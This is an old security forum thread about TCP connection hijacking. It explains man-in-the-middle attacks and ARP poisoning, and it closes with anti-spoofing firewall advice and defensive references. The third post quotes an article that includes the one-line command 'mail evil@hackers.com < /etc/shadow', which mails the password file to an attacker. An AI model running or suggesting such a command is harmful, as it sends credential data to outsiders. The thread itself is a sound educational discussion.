Connetion
Results 1 to 4 of 4

Thread: Connetion

  1. #1
    Junior Member
    Join Date
    Oct 2002
    Posts
    16

    Connetion

    Hi,

    I have heard of connections being hijacked. i just wanted to know how this works and any other information realted to this topic.

  2. #2
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Go grab AntiOnline Newsletter #6 for info about a tool, ettercap, that can do this.

    Basically, an attacker puts him/herself inbetween a client and server, acting as a go-between. The attack collects info and sometimes injects packets into the stream to gain control of a session.
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

  3. #3
    Senior Member tampabay420's Avatar
    Join Date
    Aug 2002
    Posts
    953
    4: IP hijacking

    Lets suppose I'm an ordinary computer user,i dont have security knowlegdes
    and i dont see the difference between telnet and ssh.I use telnet from home
    to start a session to my server. I enter my username and password.Then i
    will exchange datas to server without any form of authentification. An
    attacker being able to sniff around,will grab my SEQ/ACK numbers, reset my
    connection using arp poisoning and then will insert commands in my place.
    He can place easily a backdoor on my server!!(mail evil@hackers.com
    < /etc/shadow it's enough But to stop ACK storm interfering with his
    attack,a hacker must DoS me using arp poisoning or any other DoS method
    like SYN flooding. Remember how Kevin Mitnick hacked Shimomoura's network?
    Shimomoura was using rlogin becasue being the only owner of the network,
    he trusted every computers from within. Mitnick,situated outside the
    trusted zone,he impersoanted one of the trusted machines.
    He easily guessed seq/ack's because the older software was vulnerable to
    ID predictions. Today,DNS cache poisoning/IP spoofing from the internet is
    hard because the right ID is very hard to predict.But,there is arp
    spoofing .And i think that multithreaded bruteforcer will work, if you
    are lucky enough
    taken from http://black.box.sk/articles/13/arphack.txt

    as the article says, it's a bit tricky, but not impossible- unfortunately i couldn't find any defensive white papers on this subject? anyone know where?
    yeah, I\'m gonna need that by friday...

  4. #4
    Just a Virtualized Geek MrLinus's Avatar
    Join Date
    Sep 2001
    Location
    Redondo Beach, CA
    Posts
    7,324
    Here ya go -- Knock yerself out!


    www.giac.org/practical/Donna_Shuart_GSEC.doc

    www.faqs.org/rfcs/rfc1948.html

    I would think that firewall policies that defend against certain addresses NOT appearing from external would be good. e.g. use private addressing internally with a DMZ and put in "anti-spoofing policies"

    e.g.,

    Internal Machine (192.168.1.4) ---> Router/Firewall1 (192.168.1.5/10.0.0.5) --------> Router/Firewall2 (10.0.0.5/valid Internet Addy)

    Firewall 1 and 2 should never see 192.168.1.x packets originating from external. Not a perfect solution but it does help stem some of the attack.
    Goodbye, Mittens (1992-2008). My pillow will be cold without your purring beside my head
    Extra! Extra! Get your FREE copy of Insight Newsletter||MsMittens' HomePage

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •